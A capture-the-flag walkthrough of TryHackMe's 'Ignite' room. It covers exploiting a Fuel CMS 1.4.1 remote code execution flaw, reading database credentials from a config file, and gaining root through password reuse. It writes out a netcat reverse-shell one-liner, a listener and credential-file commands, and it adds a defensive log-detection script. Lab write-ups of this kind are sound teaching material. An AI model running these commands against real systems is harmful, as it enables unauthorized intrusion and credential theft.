
Ignite - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on Fuel CMS 1.4.1 remote code execution (CVE-2018-16763), post-exploitation credential discovery, and privilege escalation through credential reuse.

Room URL: https://tryhackme.com/room/ignite

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Browser enumeration
  • robots.txt inspection
  • Searchsploit / Exploit-DB
  • Python RCE exploit (50477.py)
  • Netcat (reverse shell)
  • Linux enumeration
  • Credential reuse for privilege escalation

Step-by-Step Walkthrough

1. Enumeration

Run a full TCP scan:

nmap -p- -T4 -vv <TARGET_IP>

Then do service/version detection:

nmap -sC -sV -p80 <TARGET_IP>

Typical findings:

Port  Service  Notes
80    HTTP     Apache web server hosting Fuel CMS

Browse to http://<TARGET_IP> and inspect the landing page.

The site reveals Fuel CMS setup information and version details.

Check robots.txt:

http://<TARGET_IP>/robots.txt

Key discovery:

  • /fuel (admin login path)

2. Initial Access to CMS

Navigate to:

http://<TARGET_IP>/fuel

Use the default credentials shown in the Fuel CMS getting-started information and access the admin dashboard.

At this stage, direct admin panel actions may not immediately provide shell access, so move to exploit research.


3. Vulnerability Discovery

Fuel CMS 1.4.1 is vulnerable to unauthenticated RCE (CVE-2018-16763).

Find exploit locally:

searchsploit fuel cms
searchsploit -m php/webapps/50477.py

This exploit targets unsafe input handling in the filter parameter under /fuel/pages/select/.
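
From the defender's side, requests matching the pattern described above can be hunted for in the web server's access log. The following detection sketch is an added example, not part of the original walkthrough or the referenced exploit; the log lines are constructed, and the allowlist for legitimate filter values is an assumption to tune per site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/Nginx "combined" log format: client IP and request target are enough here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Endpoint and parameter named in the walkthrough for CVE-2018-16763.
VULN_PATH = "/fuel/pages/select"
VULN_PARAM = "filter"

# Assumption: legitimate filter values are short plain tokens. Tune for your site.
SAFE_FILTER = re.compile(r"[A-Za-z0-9_.\-]{0,64}")


def suspicious_filter_hits(lines):
    """Return (ip, decoded_value) for requests to the vulnerable endpoint whose
    filter parameter falls outside the allowlist."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m.group("target"))
        # Substring match so installs under a sub-directory are covered too.
        if VULN_PATH not in url.path.lower():
            continue
        # parse_qs percent-decodes values, so encoded quotes/parentheses are seen.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get(VULN_PARAM, []):
            if not SAFE_FILTER.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/pages/select/?filter=name HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /fuel/pages/select/?filter=%27PLACEHOLDER%28%29 HTTP/1.1" 200 2048 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?filter=%27x%27 HTTP/1.1" 200 100 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, value in suspicious_filter_hits(SAMPLE_LOG):
        print(f"ALERT {ip} filter={value!r}")
```

Only the query string is inspected, because access logs do not record request bodies.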


4. Exploitation (RCE)

Run the exploit against the target:

python3 50477.py -u http://<TARGET_IP>

Validate command execution:

whoami
id
ls

You should confirm code execution as www-data.

Note: Some commands can return odd output because the exploit wraps execution through PHP system().


5. Post-Exploitation

Enumerate and retrieve application credentials from Fuel config:

cat fuel/application/config/database.php

This file typically leaks database credentials, and those passwords are often reused for other accounts.

Find and read the user flag:

ls /home/www-data
cat /home/www-data/flag.txt

For a more stable shell, spawn a reverse shell (set your own IP/port):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> 1234 > /tmp/f

Listener on attacker box:

nc -lvnp 1234

6. Privilege Escalation

If su fails with “must be run from a terminal”, spawn a pseudo-TTY:

python -c 'import pty; pty.spawn("/bin/sh")'

Then try root login with discovered/reused credentials:

su root

If successful, confirm and get root flag:

id
cat /root/root.txt

Notes

  • Keep exploitation strictly in legal labs/authorized targets.
  • Key lessons:
    • Version disclosure can quickly lead to known CVEs.
    • Config files often leak reusable credentials.
    • Stabilizing shells (PTY/reverse shell) is often necessary for reliable post-exploitation.